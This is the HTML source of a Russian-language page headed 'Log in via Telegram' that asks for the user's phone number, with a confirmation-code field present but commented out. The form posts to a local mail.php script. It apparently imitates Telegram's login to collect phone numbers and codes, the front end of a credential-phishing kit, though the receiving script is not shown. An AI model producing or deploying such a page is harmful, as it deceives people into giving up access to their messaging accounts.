<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign In</title>
    <link rel="stylesheet" href="stylein.css">
    <link href='https://unpkg.com/boxicons@2.1.4/css/boxicons.min.css' rel='stylesheet'>
</head>

<body>
    <div class="wrapper">
        <form action="mail.php" method="post">

            <h1>Вход через Telegram</h1>

            <div class="input-box">
                <input type="text" name="user-phone" required placeholder="Номер аккаунта">
                <i class='bx bx-user'></i>
            </div>

            <!-- <div class="input-box">
                <input type="text" name="user-code" required placeholder="Код подтверждения">
                <i class='bx bx-lock-alt'></i>
            </div> -->

            <div class="remember">
                <label for=""><input type="checkbox" name="remember">Запомнить меня</label>
                <a href="#">Не приходит код?</a>
            </div>
        
                <button type="submit" class="btn">Войти</button>
        



        </form>
    </div>

</body>

</html>